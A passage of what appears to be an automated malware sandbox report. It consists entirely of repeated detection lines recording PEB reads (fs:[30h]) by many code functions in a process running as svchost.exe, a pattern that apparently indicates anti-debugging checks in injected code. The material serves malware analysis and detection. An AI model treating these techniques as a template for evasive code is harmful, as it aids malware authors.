            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]1_2_0376A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]1_2_037666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]1_2_0376C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]1_2_037C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]1_2_037325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]1_2_037365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]1_2_0376E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]1_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]1_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]1_2_03764588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]1_2_037BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]1_2_037EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]1_2_0372645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]1_2_0375245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]1_2_0372C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]1_2_037304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]1_2_037644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]1_2_037BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]1_2_037364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]1_2_037EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]1_2_0372CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728B50 mov eax, dword ptr fs:[00000030h]1_2_03728B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]1_2_037DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]1_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]1_2_037D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804B00 mov eax, dword ptr fs:[00000030h]1_2_03804B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]1_2_0375EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]1_2_037BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]1_2_037DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]1_2_03804A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]1_2_037DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]1_2_0376CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]1_2_0375EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]1_2_037BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]1_2_03730AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]1_2_03786AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]1_2_03768A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]1_2_037BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]1_2_037B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]1_2_037B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]1_2_037C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]1_2_037BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]1_2_037BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]1_2_037649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]1_2_037FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]1_2_037C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804940 mov eax, dword ptr fs:[00000030h]1_2_03804940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]1_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]1_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]1_2_037309AD
